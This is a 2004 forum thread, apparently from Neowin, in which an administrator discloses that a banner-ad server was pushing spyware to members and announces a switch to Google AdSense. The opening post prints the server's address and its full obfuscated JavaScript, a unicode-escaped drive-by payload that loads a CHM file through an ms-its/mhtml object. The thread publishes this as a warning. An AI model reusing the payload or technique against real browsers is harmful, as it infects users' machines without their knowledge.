Ad provider change & Info on Spyware

[Steven P. Administrators]

ok first off I want to thank Adster. We had some pretty heated discussion on the method of his postings but I am now convinced he was helping, and he did.. Heres what we found out:

I got the PM from Adster and he is correct that an adserver is loading spyware on members PC's I can't however trace the IP to a single advertiser.

The IP is 69.50.139.61 and the url is 69.50.139.61/hp1/hp1.htm (url disabled, don't access it on an unprotected PC please) it contains java script:

<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

<script type="text/javascript">document.write('\u003c\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a\u000d\u000a')</script>

if you browse to the root folders you get the message: This is an adserver. Please contact advertisers directly

So I think we can safely say this does come from one of our advertisers. I have blocked the IP in cPanel..

a WHOIS returns very little information:

NationalNet, Inc. NATL-MACH10-NET (NET-69-50-128-0-1)

                                    69.50.128.0 - 69.50.143.255

OMEGABYTE Computer Corporation MACH10-OMEGA1 (NET-69-50-139-0-1)

                                    69.50.139.0 - 69.50.139.127

 

# ARIN WHOIS database, last updated 2004-04-20 20:01

# Enter ? for additional hints on searching ARIN's WHOIS database.

and now for the bad news..

http://www.google.nl/search?num=20&hl=en&i...Inc&btnG=Search

NationalNet Inc is a large Adult hosting company, so this makes me wonder what they are doing to with our webviews and why they are involved with one of our ad companies!

As a result we have disabled ALL 468x60 ads and become a member of Google AdSense (which are now displaying all 468x60 ads on Neowin). We can be sure the ads they deliver will not attempt to load spyware on your PC. The intelliText on the main page, AdSquares and towers remain (also not on the forums anyway) Google AdSense also has the option to deliver feedback if you click the Ads by Google link.

I want to thank everyone who helped us get to the bottom of this the only negative side to this is that we couldn't find out which advertiser controls that IP (all our advertisers deny being involved with Spyware)

[Japlabot]

So are the Google ads per view or per click? and do they pay the same/more/less? I definately hope that it's enough to pay for your costs otherwise if you are losing money, I would do something to help get some more money into Neowin.

[aem4162]

what, if anything do we do to get the stuff off our computers? i'm gonna run ad-aware and spybot....

[Ivand]

I like the changes Neobond, i like more the no graphical ads by googl

[Chode]

Great changes (Y)

I've never seen a problem with Google's ads

[kongit]

(Y) great.

ps. this thread is insanely wide.

[Wiser87]

(Y) great.

ps. this thread is insanely wide.

Hahahahaha! I was wondering when someone was going to mention that! :D :laugh:

[Steven P. Administrators]

(Y) great.

ps. this thread is insanely wide.

not for me it isn't (using IE6)

[calidude]

Not insanely wide for me either...

[Japlabot]

it's screwed up for me in IE6, but worse in the fox.

[Oblivion]

Nice Move Neobond (Y)

[Si Veteran]

Wow Neobond is romping through the site maintenance at the minute!

Thanks for you hard work! (Y)

Also, this thread is very wide (using firefox 0.8+)

[Rell]

ps. this thread is insanely wide.

Description of post should say...

"Warning: Some users of alternative browsers (Firefox) may experience a wide load."

:rofl:

[tomwarren Veteran]

Good to hear :)

Bloody advertising companies, anyway to make money - pssh.

[Toxikk Veteran]

woohoo! finally got to the bottom of that whole mess.

thanks! the new ones look great.

[Frank]

For the people having problems with the thread being wide, try changing your resolution. Mine was fine untill SOMEONE posted a pic. :D

[Adster]

It's me again! :p

I just wanted to thank Neobond for nipping this thing before the problem became more widespread. He's a great Admin. Thumbs up to you! (Y)

On a side note, one more thing about that trojan that I didn't realize earlier. It replaces wmplayer.exe with an installation file so when you try to open a video or audio file that opens in Windows Media Player, it downloads more spyware instead. To fix that, run wm_setup.exe in the same directory (usually C:\Program Files\Windows Media Player) and it will re-download the original wmplayer.exe file.

Once again, thanks Neobond!

[Zetter]

the google adds may not be as relevent as they could be...

Longhorn Texas

Compare and buy it on eBay. Thousands of new & used items!

Methinks Keywords should be re-thought

[Steven P. Administrators]

the google adds may not be as relevent as they could be...

Longhorn Texas

Compare and buy it on eBay. Thousands of new & used items!

Methinks Keywords should be re-thought

I thought I asked people not to whine about the ads. How many times do I have to say that we need them, do you think I want them?

[vip]

wow, this thread is like WHOA wide ....